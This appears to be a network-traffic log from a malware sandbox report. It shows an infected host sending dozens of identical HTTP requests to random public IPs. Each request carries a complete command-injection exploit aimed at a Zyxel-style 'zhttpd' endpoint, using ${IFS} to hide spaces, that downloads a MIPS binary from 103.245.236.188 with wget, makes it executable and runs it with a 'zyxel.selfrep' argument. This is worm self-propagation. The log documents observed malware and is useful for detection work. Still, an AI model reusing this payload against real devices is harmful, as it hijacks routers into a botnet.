                                    Jan 13, 2024 19:02:48.510885954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8006192.168.2.13533029.14.189.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510946035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8007192.168.2.1350136101.114.103.121443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.510989904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8008192.168.2.1351482190.82.96.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511069059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8009192.168.2.1340248118.254.160.80443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511090040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8010192.168.2.133915025.115.167.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511159897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8011192.168.2.1348540206.4.250.167443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511192083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8012192.168.2.1353846124.9.247.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511218071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8013192.168.2.1345564159.151.244.184443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511287928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8014192.168.2.1350130102.95.22.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511308908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8015192.168.2.135943294.70.96.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511363983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8016192.168.2.134123061.216.113.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511406898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8017192.168.2.133416018.3.57.217443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511444092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8018192.168.2.1349958184.236.129.143443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511485100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8019192.168.2.1350932162.165.35.31443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511513948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8020192.168.2.1360520117.132.141.139443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511544943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8021192.168.2.135142273.15.52.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511570930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8022192.168.2.135565625.173.185.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511631012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8023192.168.2.1353290152.81.1.200443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511688948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8024192.168.2.134202077.232.185.99443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511728048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8025192.168.2.1350236136.185.230.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511773109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8026192.168.2.1344852200.73.192.112443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511806965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8027192.168.2.134715013.4.167.234443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511871099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8028192.168.2.1350014106.123.238.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511910915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8029192.168.2.135044292.159.232.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511954069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8030192.168.2.1333082116.73.235.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.511982918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8031192.168.2.1335766189.21.216.159443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512033939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8032192.168.2.1345402174.98.184.196443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512092113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8033192.168.2.135758824.96.120.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512120962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8034192.168.2.1348158223.161.136.151443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512180090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8035192.168.2.135616059.15.46.50443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512212038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8036192.168.2.1335682204.4.187.33443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512274981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8037192.168.2.1349038112.200.58.78443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512352943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8038192.168.2.135251490.235.245.9443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512387037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8039192.168.2.1340908140.43.210.152443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512438059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8040192.168.2.134594448.178.110.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512487888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8041192.168.2.135756645.121.229.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512538910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8042192.168.2.133562880.187.60.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512579918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8043192.168.2.1356996119.78.170.127443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512655020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8044192.168.2.1342008133.94.165.251443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512664080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8045192.168.2.134733025.41.126.100443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512722015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8046192.168.2.1344602187.155.100.136443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512788057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8047192.168.2.1338134144.255.41.4443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512847900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8048192.168.2.1352612143.66.31.212443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512876034 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8049192.168.2.1345786216.90.25.95443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512922049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8050192.168.2.1358576175.216.160.92443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.512974024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8051192.168.2.133318836.213.222.162443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513024092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8052192.168.2.1334560191.129.10.192443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513056993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8053192.168.2.134076666.68.33.191443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513118029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8054192.168.2.13427404.222.106.75443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513170958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8055192.168.2.1334066161.199.163.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513231993 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8056192.168.2.1343558148.139.248.245443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513293982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8057192.168.2.134609079.92.30.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513322115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8058192.168.2.134760493.117.21.125443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513360023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8059192.168.2.1349024171.98.249.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513425112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8060192.168.2.134745477.118.37.42443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513458014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8061192.168.2.135402825.13.139.24443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513505936 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8062192.168.2.134195439.119.25.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513546944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8063192.168.2.1346008157.216.92.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513601065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8064192.168.2.1359996148.55.107.71443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513647079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8065192.168.2.1355590219.87.97.8443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513689995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8066192.168.2.1355828155.45.142.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513756037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8067192.168.2.1343002179.207.123.233443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:48.513787985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    8068192.168.2.1344686202.123.142.71443
                                    TimestampBytes transferredDirectionData
